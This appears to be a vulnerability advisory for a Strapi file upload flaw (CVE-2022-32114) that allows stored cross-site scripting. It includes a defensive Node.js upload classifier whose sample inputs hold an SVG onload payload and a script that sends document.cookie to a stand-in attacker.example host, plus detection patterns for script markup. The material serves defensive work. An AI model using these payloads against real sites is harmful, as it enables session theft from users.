Description
An unrestricted file upload vulnerability (CWE-434) in the Add New Assets function of Strapi v4.1.12 allows an authenticated attacker to store a file carrying a browser-executable payload that Strapi then serves back at a URL under its own origin. When a victim copies that URL into a new tab, the payload runs in the victim's browser in the context of the Strapi application, so the impact is stored cross-site scripting (CWE-79) rather than code execution on the server, despite the "arbitrary code" wording carried over from the CVE text. The attacker needs upload rights but no further interaction beyond getting the victim to open the link.
Recommendation
No fix is available yet. The following versions are affected:
- <= 4.1.12
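Until a fixed release is available, the practical mitigation is on the serving side: treat every uploaded asset as untrusted bytes, identify its type from content rather than from the extension or the client-declared MIME type, refuse files that contain active markup, and never let anything except known raster images render inline on the application origin. The following is an added example written for this page, not code from the Strapi project; the magic-byte table, the regex list and the sample uploads (including the `attacker.example` host) are constructed for illustration, and the regex screen is deliberately over-broad because a rejected upload is cheap and a missed one is stored XSS.

```javascript
// Added example, not Strapi code: classify an uploaded asset by its bytes and
// build the response headers under which it may be served from the app origin.
// Node.js 18+, built-in globals only (Buffer).

// Raster formats identified by magic bytes; only these are rendered inline.
const INLINE_TYPES = [
  { type: 'image/png',  magic: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { type: 'image/jpeg', magic: [0xff, 0xd8, 0xff] },
  { type: 'image/gif',  magic: [0x47, 0x49, 0x46, 0x38] },
];

// Over-broad on purpose: anything a browser would execute if the file were
// opened at a URL on this origin.
const ACTIVE_CONTENT = [
  /<\s*script\b/i,
  /\son[a-z]+\s*=/i,                      // onload=, onerror=, ... on any element
  /javascript\s*:/i,                      // javascript: URLs in href / xlink:href
  /<\s*(iframe|object|embed|meta)\b/i,
];

// Content sniffing the way a browser would do it, so the check cannot be
// bypassed by renaming evil.html to avatar.png.
function sniff(buf) {
  for (const { type, magic } of INLINE_TYPES) {
    if (buf.length >= magic.length && magic.every((b, i) => buf[i] === b)) {
      return type;
    }
  }
  const head = buf.subarray(0, 1024).toString('latin1');
  if (/<\s*svg\b/i.test(head)) return 'image/svg+xml';
  if (/<\s*(!doctype\s+html|html|script|body)\b/i.test(head)) return 'text/html';
  return 'application/octet-stream';
}

// Returns { accept: false, reason } or { accept: true, type, headers }.
function classifyUpload(filename, buf) {
  const type = sniff(buf);
  const isMarkup = type === 'image/svg+xml' || type === 'text/html';

  if (isMarkup) {
    const text = buf.toString('latin1');
    const hit = ACTIVE_CONTENT.find((re) => re.test(text));
    if (hit) {
      return { accept: false, reason: `${filename}: active content ${hit} in ${type}` };
    }
  }

  // Keep CR/LF and quotes out of the header we echo the name into.
  const safeName = filename.replace(/[^\w.-]/g, '_');
  const headers = { 'X-Content-Type-Options': 'nosniff' };

  if (INLINE_TYPES.some((t) => t.type === type)) {
    headers['Content-Type'] = type;
    headers['Content-Disposition'] = 'inline';
  } else {
    // SVG, PDF, unknown binaries: never render on this origin. A regex is not
    // an XML parser, so even "clean" SVG is only offered as a download.
    headers['Content-Type'] = 'application/octet-stream';
    headers['Content-Disposition'] = `attachment; filename="${safeName}"`;
    headers['Content-Security-Policy'] = 'sandbox';
  }
  return { accept: true, type, headers };
}

// Constructed sample uploads, not real files from any incident.
const SAMPLES = {
  'logo.png':   Buffer.concat([Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]), Buffer.alloc(16)]),
  'a.svg':      Buffer.from('<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>'),
  'avatar.png': Buffer.from('<html><script>location="https://attacker.example/?c="+document.cookie</script></html>'),
  'icon.svg':   Buffer.from('<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'),
};

for (const [name, buf] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(classifyUpload(name, buf)));
}
```

Two of the four samples are rejected (the SVG with an `onload` handler and the HTML file disguised as a PNG), the real PNG is served inline with its sniffed type, and the script-free SVG is accepted but only as a sandboxed download. Serving uploads from a separate, cookie-less origin removes the remaining risk entirely, since a script that does run there has nothing of the Strapi session to steal.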
References
- GHSA-4vm8-j95f-j6v5
- grimthereaperteam.medium.com
- docs.strapi.io
- CVE-2022-32114
- CWE-434
- CWE-79
- CAPEC-310
- OWASP 2021-A3
- OWASP 2021-A4
- OWASP 2021-A6
Related Issues
- Strapi is vulnerable to Insufficient Session Expiration - CVE-2025-3930
- Prototype Pollution in lodash (GHSA-4xc9-xhrj-v574) - CVE-2018-16487
- jquery-validation vulnerable to Cross-site Scripting - CVE-2025-3573
- @mozilla/readability Denial of Service through Regex - CVE-2025-2792
Tags:
- npm
- @strapi/strapi
Last updated on March 21, 2024